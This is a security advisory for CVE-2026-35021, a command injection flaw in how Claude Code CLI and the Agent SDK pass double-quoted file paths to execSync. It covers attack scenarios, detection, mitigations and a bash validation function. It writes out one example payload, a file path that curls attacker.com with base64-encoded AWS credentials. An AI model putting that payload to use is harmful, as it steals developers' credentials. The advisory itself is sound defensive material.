CVE-2026-35021 Overview
Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the prompt editor invocation utility that allows attackers to execute arbitrary commands by crafting malicious file paths. Attackers can inject shell metacharacters such as $() or backtick expressions into file paths that are interpolated into shell commands executed via execSync. Although the file path is wrapped in double quotes, POSIX shell semantics (POSIX §2.2.3) do not prevent command substitution within double quotes, allowing injected expressions to be evaluated and resulting in arbitrary command execution with the privileges of the user running the CLI.
Critical Impact
Arbitrary command execution with user privileges through malicious file path injection in AI development tools, potentially compromising developer workstations and CI/CD environments.
Affected Products
- Anthropic Claude Code CLI
- Anthropic Claude Agent SDK
- Development environments utilizing the prompt editor invocation utility
Discovery Timeline
- 2026-04-06 - CVE-2026-35021 published to NVD
- 2026-04-07 - Last updated in NVD database
Technical Details for CVE-2026-35021
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS Command Injection. The flaw exists in the prompt editor invocation utility within the Claude Code CLI and Claude Agent SDK. When users interact with the CLI, file paths are processed and interpolated directly into shell commands that are executed using the execSync function.
The core issue stems from insufficient sanitization of user-supplied file paths before they are passed to the shell. While the implementation wraps file paths in double quotes as a protective measure, this approach fails to prevent command injection because POSIX shell semantics explicitly allow command substitution within double-quoted strings. Specifically, POSIX §2.2.3 defines that $() syntax and backtick expressions are expanded even within double quotes.
An attacker who can control or influence the file path—whether through social engineering, malicious repositories, or compromised project configurations—can craft a path containing shell metacharacters that execute arbitrary commands when the CLI processes the file.
Root Cause
The root cause is the use of execSync with string interpolation to construct shell commands without proper input sanitization. The developers' assumption that double-quoting file paths would prevent command injection is incorrect under POSIX shell semantics. The proper mitigation is either to use array-based command execution, which avoids shell interpretation entirely, or to implement strict input validation that rejects or escapes shell metacharacters before interpolation.
Attack Vector
This vulnerability requires local access and user interaction. An attacker must craft a malicious file path containing shell metacharacters such as $(malicious_command) or `malicious_command`. When a user invokes the prompt editor utility with this crafted path—either directly or through a poisoned project configuration—the injected commands execute with the privileges of the user running the CLI.
Attack scenarios include:
- Malicious Repository Cloning: An attacker publishes a repository containing project files with crafted file paths that execute commands when developers use Claude Code CLI tools
- CI/CD Pipeline Compromise: In automated environments, attackers could inject malicious paths through pull requests or configuration files, leading to credential exfiltration
- Social Engineering: Tricking users into opening projects or files with specially crafted names
The vulnerability mechanism involves the shell interpreting command substitution expressions within double quotes. For example, a file path like $(curl attacker.com/exfil?data=$(cat ~/.aws/credentials | base64)) would execute the nested commands before the outer command completes. Technical details are available in the VulnCheck Advisory.
Detection Methods for CVE-2026-35021
Indicators of Compromise
- Unusual process spawning from Claude Code CLI or Agent SDK processes, particularly network-related commands like curl, wget, or nc
- File paths containing shell metacharacters ($(), backticks, |, ;) in project configurations or command history
- Unexpected outbound network connections originating from development tool processes
- Credential file access patterns inconsistent with normal development workflows
Detection Strategies
- Monitor process trees for suspicious child processes spawned by Node.js processes running Claude Code CLI
- Implement file integrity monitoring on sensitive credential stores and configuration files accessed during CLI operations
- Deploy endpoint detection rules that alert on command substitution patterns in file path arguments
- Analyze command-line arguments passed to shell execution functions for injection patterns
Monitoring Recommendations
- Enable verbose logging for Claude Code CLI and Agent SDK to capture file path operations
- Configure SIEM rules to correlate file path inputs with subsequent process creation events
- Monitor for base64 encoding operations combined with network exfiltration attempts
- Establish baseline behavior for Claude Code CLI processes and alert on deviations
How to Mitigate CVE-2026-35021
Immediate Actions Required
- Review and audit any project configurations, especially those from untrusted sources, for malicious file paths containing shell metacharacters
- Restrict usage of Claude Code CLI in automated CI/CD environments until patched versions are available
- Implement network segmentation to limit the impact of potential command execution from developer workstations
- Educate development teams about the risk of opening untrusted projects with AI coding tools
Patch Information
Organizations should monitor Anthropic's official channels for security updates addressing this vulnerability. Review the Phoenix Security Analysis and VulnCheck Advisory for the latest remediation guidance and patch availability information.
Workarounds
- Implement wrapper scripts that validate file paths before passing them to Claude Code CLI, rejecting paths containing $, backticks, or other shell metacharacters
- Run Claude Code CLI in isolated container environments with minimal privileges and no access to sensitive credentials
- Use sandboxed execution environments that prevent network access from CLI processes
- Temporarily disable or bypass the prompt editor invocation utility if possible, using alternative workflows
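    # Example file path validation before CLI invocation
    validate_path() {
        local path="$1"
        # Reject paths containing shell metacharacters: $ ` | ; & and ".
        # A double quote would close the quoting the CLI applies to the path.
        # The pattern is kept in a variable so bash treats it as a regex.
        local pattern='[$`|;&"]'
        if [[ "$path" =~ $pattern ]]; then
            echo "ERROR: Potentially malicious file path detected" >&2
            exit 1
        fi
    }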


